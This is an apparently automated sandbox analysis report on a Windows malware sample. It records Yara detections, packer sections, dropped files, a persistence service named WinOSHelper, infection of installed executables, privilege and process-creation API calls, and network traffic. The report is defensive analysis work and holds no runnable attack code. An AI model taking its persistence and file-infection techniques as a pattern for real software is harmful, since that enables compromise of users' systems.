Windows Analysis Report
LisectAVT_2403002B_48.exe

Malicious sample detected (through community Yara rule)

System Summary

Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 2.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.LisectAVT_2403002B_48.exe.10000000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 2.2.svchost.exe.1000b39c.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen
Source: 0.2.LisectAVT_2403002B_48.exe.1000b39c.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables using BlackMoon RunTime Author: ditekSHen

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: VSFdoO.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Windows\SGuard.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00401E84 GetCurrentProcess,OpenProcess,LocalAlloc,NtQueryInformationProcess,LocalFree,CloseHandle,		0_2_00401E84
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_1000602E GetCurrentProcess,OpenProcess,LocalAlloc,NtQueryInformationProcess,LocalFree,CloseHandle,		0_2_1000602E

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_1000477D WTSGetActiveConsoleSessionId,74AE1930,DuplicateTokenEx,74727ED0,CreateProcessAsUserA,

0_2_1000477D

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Windows\SGuard.exe

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B6076		1_2_000B6076
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B6D00		1_2_000B6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\VSFdoO.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: LisectAVT_2403002B_48.exe	Binary or memory string: OriginalFilename vs LisectAVT_2403002B_48.exe
Source: LisectAVT_2403002B_48.exe, 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameSGuard.exe4 vs LisectAVT_2403002B_48.exe

Source: LisectAVT_2403002B_48.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 2.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.LisectAVT_2403002B_48.exe.405218.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.LisectAVT_2403002B_48.exe.10000000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 2.2.svchost.exe.1000b39c.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
Source: 0.2.LisectAVT_2403002B_48.exe.1000b39c.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime

Source: VSFdoO.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: VSFdoO.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: VSFdoO.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: LisectAVT_2403002B_48.exe

Static PE information: Section: .MPRESS1 ZLIB complexity 1.000313442138219

Source: classification engine

Classification label: mal100.rans.spre.troj.evad.mine.winEXE@14/19@67/4

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Code function: 1_2_000B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_000B119F

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_100011BB

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_10006649 CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,FindCloseChangeNotification,

0_2_10006649

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_1000626A ServiceMain,StartServiceCtrlDispatcherA,

0_2_1000626A

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

File created: C:\Users\user\AppData\Roaming\winoshelper.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6668

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

File created: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Source: C:\Windows\SGuard.exe

File read: C:\Program Files\desktop.ini

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe "C:\Users\user\Desktop\LisectAVT_2403002B_48.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Process created: C:\Users\user\AppData\Local\Temp\VSFdoO.exe C:\Users\user\AppData\Local\Temp\VSFdoO.exe
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k NetworkService -s WinOSHelper
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SGuard.exe -Embedding
Source: C:\Windows\SGuard.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Process created: C:\Users\user\AppData\Local\Temp\VSFdoO.exe C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SGuard.exe -Embedding	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SGuard.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Detected unpacking (changes PE section rights)

Source: Google Chrome.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Internet Explorer.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Internet Explorer\iexplore.exe
Source: Google Chrome.lnk0.3.dr	LNK file: ..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Microsoft Edge.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: LisectAVT_2403002B_48.exe

Static file information: File size 1133568 > 1048576

Source: LisectAVT_2403002B_48.exe

Static PE information: Raw size of .MPRESS1 is bigger than: 0x100000 < 0x10d800

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Unpacked PE file: 0.2.LisectAVT_2403002B_48.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W;Tu3:EW; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;Tu3:EW;
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Unpacked PE file: 1.2.VSFdoO.exe.b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

Drops executables to the windows directory (C:\Windows) and starts them

Source: initial sample

Static PE information: section where entry point is pointing to: Tu3

Source: LisectAVT_2403002B_48.exe	Static PE information: section name: .MPRESS1
Source: LisectAVT_2403002B_48.exe	Static PE information: section name: .MPRESS2
Source: LisectAVT_2403002B_48.exe	Static PE information: section name: Tu3
Source: VSFdoO.exe.0.dr	Static PE information: section name: .aspack
Source: VSFdoO.exe.0.dr	Static PE information: section name: .adata
Source: winoshelper.dll.0.dr	Static PE information: section name: UPX2
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00405C53 pushfd ; retf	0_2_00405C7B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00405C7C pushfd ; retf	0_2_00405C7B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00408819 push es; iretd	0_2_0040888B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00408268 push cs; retf	0_2_00408273
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00408275 push cs; retf	0_2_00408273
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00408275 push edx; ret	0_2_004082F2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00408B28 push cs; iretd	0_2_00408B34
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00405F33 push es; retf	0_2_00405F55
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_004063FA push cs; retf	0_2_004063FB
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_004063A3 pushfd ; iretd	0_2_004063A7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_004087B6 push es; iretd	0_2_0040888B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100EB00B push es; iretd	0_2_100EB02C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100EAC54 push es; iretd	0_2_100EAC55
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100E8871 push es; ret	0_2_100E8874
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100EAE73 push esi; iretd	0_2_100EAE74
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100EC725 push edx; iretd	0_2_100EC727
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100EBB32 push ecx; ret	0_2_100EBB3F
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100E97AE pushfd ; iretd	0_2_100E97C2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100E97C4 push es; iretd	0_2_100E97C7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100E8FF6 push es; retf	0_2_100E8FF8
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B1638 push dword ptr [000B3084h]; ret	1_2_000B170E
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B600A push ebp; ret	1_2_000B600D
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B2D9B push ecx; ret	1_2_000B2DAB
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B6014 push 000B14E1h; ret	1_2_000B6425

Source: LisectAVT_2403002B_48.exe	Static PE information: section name: .MPRESS1 entropy: 7.999833456794264
Source: LisectAVT_2403002B_48.exe	Static PE information: section name: Tu3 entropy: 6.934576836261578
Source: VSFdoO.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934484616247345
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934353058943832
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.935177766542733

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\svchost.exe

Executable created and started: C:\Windows\SGuard.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	File created: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\Windows\SGuard.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	File created: C:\Users\user\AppData\Roaming\winoshelper.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Windows\SGuard.exe

Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinOSHelper

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

Uses known network protocols on non-standard ports

Hooking and other Techniques for Hiding and Protection

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
